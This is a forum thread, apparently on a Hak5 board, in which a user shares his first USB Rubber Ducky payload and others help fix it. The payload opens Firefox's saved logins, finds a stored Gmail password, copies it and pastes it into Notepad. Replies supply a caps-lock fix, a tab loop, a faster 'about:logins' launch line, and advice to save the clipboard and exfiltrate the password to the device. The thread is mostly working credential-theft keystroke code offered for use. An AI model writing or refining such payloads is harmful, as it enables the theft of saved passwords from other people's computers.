HoodedSoldier Posted August 26, 2022 Posted August 26, 2022 Not sure if this is where I'm suppose to place this. But like the Title says. If I leave the caps lock key on the payload works like I want it to so far but if I turn off the caps key it does not tab properly. If this is the wrong location please point me to the right forum and yes I do have the latest Ducky with the USB C. REM My first payload REM HOODEDSOLDIER REM COPY GMAIL PASSWORD INTO NOTEPAD DELAY 3000 GUI r DELAY 500 STRING firefox DELAY 1000 ENTER DELAY 1000 STRING about:preferences#privacy ENTER DELAY 500 STRING password DELAY 1000 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 TAB DELAY 300 ENTER DELAY 1000 STRING gmail DELAY 300 ENTER TAB TAB TAB TAB TAB TAB TAB TAB TAB TAB TAB DELAY 300 ENTER DELAY 1000 CTRL W DELAY 1000 CTRL W DELAY 500 GUI r DELAY 500 STRING notepad DELAY 600 ENTER DELAY 1000 CTRL V
RootJunky Posted August 26, 2022 Posted August 26, 2022 you could always just run this at the beginning of your payload to turn off capslock before the rest of the payload runs SAVE_HOST_KEYBOARD_LOCK_STATE DELAY 500IF ( $_CAPSLOCK_ON == TRUE ) THEN CAPSLOCK DELAY 500 END_IF
HoodedSoldier Posted August 26, 2022 Author Posted August 26, 2022 Thanks Root. I was going to ask what did this piece of code do but I realized it's turning off the caps. But it didn't fix the issue. In lowercase the script stops tabbing over before it gets to "Saved Logins." It's actually stopping after 6 tabs instead of the 9 I have in the script. Funny when I actually tab it's 8 but for some reason 9 tabs does the trick but that's another problem. I do appreciate the help though.
dark_pyrro Posted August 26, 2022 Posted August 26, 2022 You could probably at least skip one section of tabs by using about:logins instead of about:preferences#privacy
dark_pyrro Posted August 26, 2022 Posted August 26, 2022 Not that it probably will change anything regarding your observed CAPS issues, but you might be able to handle the repeated tabs in another way. Perhaps not making the number of lines that much smaller but it's nice to use some of the Ducky Script 3.0 features as well as open up for easier management of the code since you don't need to change a lot of lines if doing some code editing. The counter might need some tweaking, but you'll find out when testing the payload. DEFINE TABDELAY 250 VAR $TAB_CNTR = 11 WHILE ( $TAB_CNTR > 0 ) TAB DELAY TABDELAY $TAB_CNTR = ( $TAB_CNTR - 1 ) END_WHILE
Darren Kitchen Posted August 26, 2022 Posted August 26, 2022 I might also mention that in addition to what @dark_pyrrorecommended re: about:logins vs about:preferences#privacy — you could speed up the script a bit more by replacing your initial Run dialog line with: GUI r DELAY 500 STRINGLN firefox about:logins This will open Firefox to the logins page with the search field active, so from there you can go straight to typing in your target. I also notice that tabbing to the password COPY button takes 11 tab keystrokes, while `SHIFT TAB` only takes 9 — at least on mine. Something to consider.
HoodedSoldier Posted August 26, 2022 Author Posted August 26, 2022 You guys are dope! I appreciate the responses and help. @dark_pyrro I don't think I'm there yet with the code you provided. Over my head. I'm sure it works but I wouldn't understand how it works yet so don't want to use it just yet. Thanks @Darren Kitchen for that extra piece. I'm going to try it out now. Been working on the script right now actually. Looks like with the latest update pushed out to PayLoad Studio has fixed the issue with the caps lock for now. Thanks again guys!
Darren Kitchen Posted August 26, 2022 Posted August 26, 2022 Also, not sure how far you wanna take this demo Firefox password nabbing payload — but I realize you could use the powershell command Get-Clipboard to save the contents (password) to a file, then use a snippet from the Keystroke Reflection example to transmit it back to the USB Rubber Ducky. Further reading https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard?view=powershell-7.2 https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-2
HoodedSoldier Posted August 26, 2022 Author Posted August 26, 2022 1 hour ago, Darren Kitchen said: Also, not sure how far you wanna take this demo Firefox password nabbing payload — but I realize you could use the powershell command Get-Clipboard to save the contents (password) to a file, then use a snippet from the Keystroke Reflection example to transmit it back to the USB Rubber Ducky. Further reading https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard?view=powershell-7.2 https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#example-2 Now this is what I was looking for last night. I was trying to figure out how to save the file to the drive but couldn't for the life of me find a solution. I'll give it a try later today and report back. Appreciate the help!
Recommended Posts
Archived
This topic is now archived and is closed to further replies.